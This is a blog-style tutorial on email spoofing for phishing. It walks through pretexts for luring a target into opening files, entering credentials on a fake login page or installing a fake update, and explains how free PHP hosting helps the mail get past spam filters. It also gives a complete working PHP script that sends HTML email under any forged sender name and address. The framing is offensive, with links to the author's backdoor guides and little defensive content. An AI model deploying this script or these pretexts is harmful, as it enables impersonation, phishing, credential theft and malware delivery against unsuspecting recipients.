How hackers impersonate email-id’s : Email Spoofing and Phishing Attacks

Email Spoofing

Email Spoofing is a type of cyber-attack where the attacker sends fake emails which appear to have been sent by a legitimate/known person or entity. It is a common tactic for carrying out phishing attacks or spamming. The receiver of the email will see an email they trust and a name they are familiar with — mostly a friend or a colleague or an organisation they work with) and end up believing the email and taking action as mentioned.

In my previous blogs, I have mentioned how to create trojan and backdoors. When executed, the users sees normal files, but in the background, the evil code gets executed.

Delivering these files can be an application of email spoofing.

https://infosecwriteups.com/how-i-created-an-undetectable-backdoor-for-windows-ethical-hacking-d26e40a0echttps://infosecwriteups.com/how-i-created-an-undetectable-backdoor-for-windows-ethical-hacking-d26e40a0ec

How to Spoof Emails

The initial step relies on information gathered and deciding which email you want to spoof. The emails should impersonate emails from a person or an organisation that the target can trust. It’s all social engineering!

If you are impersonating a friend, you can tell the target person to open an image. If you impersonate a support member from an organisation or admin of a website, you can tell the target to log in using a fake login page or tell the target to install an update.

Take a scenario

Suppose I want to impersonate the target person’s friend whose name is Aakashand I know that his email id is aakash@gmail.com . I will try to send a fake email to my target impersonating his email id.

It is really easy. Go to google and search for spoof emails online.

You will find a lot of websites providing this service. The problem with sending emails from these websites is that a lot of these emails will end up in the spam directory of the target person and not in the inbox of the person. The reason for this is because these websites are public and a lot of people use these websites for spamming, so mail server like google, yahoo, etc. mark emails received from these servers as spam.

To bypass this you can either use your own web-hosting plan or you can sign up for a free web-hosting plan and use that for sending fake emails.

Using a web hosting plan

The requirement for this method is that the web-hosting provider should support php files, so a static web-hosting won’t work. You can also use your own domain with the web-hosting provider but for this blog I will use a free web-hosting provider. I will be using https://www.000webhost.com/.

This is a paid service but I will be using their free plan for this blog. Go to the above link, scroll down and click on Free Sign Up under the Free Web Hosting .

After signing up, click on Create new site button on the top right.

A pop-up will appear where you would need to add your website name and password. Now remember both of these.

Next open https://files.000webhost.com/ in the same browser where you are logged into the webhost account. You may or may not need to enter the above credentials. If you are prompted, enter the above credentials and proceed. A page similar to the one shown below should be visible.

Open the folder named public_html by double clicking. Save the following script in a file named send.php and upload it to the folder named public_html

<?php

if (isset($_POST["send"])) {

$to = $_POST["to"];
 $subject = $_POST["subject"];
 $message = $_POST["message"];
 $from = $_POST["from"];
 $name = $_POST["name"];

if (!(filter_var($to, FILTER_VALIDATE_EMAIL) && filter_var($from, FILTER_VALIDATE_EMAIL))) {
  echo "Email address inputs invalid";
   die();
 }

$header = "From: " .  $name . " <" . $from . ">\r\nMIME-Version: 1.0\r\nContent-type: text/html\r\n";

$retval = mail ($to, $subject, $message, $header);

if ($retval) {
  echo "Email sent.";
 } else {
  echo "Email did not send. Error: " . $retval;
 }
} else {
 echo 
 '<html>
  <head>
   <style> 
    input[type=submit] {
      background-color: #4CAF50;
      border: none;
      color: white;
      padding: 14px 32px;
      text-decoration: none;
      margin: 4px 2px;
      cursor: pointer;
      font-size: 16px;
    }
   </style>
  </head>
  <body>

<h2>Spoof Email</h2>

<form action="/send.php" method="post" id="emailform">
     <label for="to">To:</label><br>
     <input type="text" id="to" name="to"><br><br>
     <label for="from">From:</label><br>
     <input type="text" id="from" name="from"><br><br>
     <label for="name">Name (optional):</label><br>
     <input type="text" id="name" name="name"><br><br>
     <label for="subject">Subject:</label><br>
     <input type="text" id="subject" name="subject"><br><br>
     <label for="message">Message [HTML is supported]:</label><br>
     <textarea rows="6" cols="50" name="message" form="emailform"></textarea><br><br>
     <input type="hidden" id="send" name="send" value="true">
     <input type="submit" value="Submit">
   </form>

<p>An e-mail will be sent to the desired target with a spoofed From header when you click Submit.</p>

</body>
 </html>' ;
}

?>

Great we are done !!! Now it’s time for some action. Goto the homepage of 000webhost . Your site will appear in a card. Click on the url.

For me the url is https://test-xyz-infinee.000webhostapp.com/ .

I need to append send.php to the end of the url and run it.  So for me the url will be https://test-xyz-infinee.000webhostapp.com/send.php

A form similar to the one shown below will appear.

Since I was impersonating Aakash whose email id is aakash@gmail.com , I will fill in the details accordingly.

And finally click on submit and poof! Email Sent

On checking my email (target_email), I actually received an email from the email address aakash@gmail.com . I also got a notification on my iPhone and it looks pretty convincing and authentic!

Attaching screenshots of how the emails look on the browser when opened.

The name appears correctly. Even the email id appears correctly.

The only way to distinguish that it is not original and is a phishing email is the text written after via , that too only if the email is viewed in a web browser.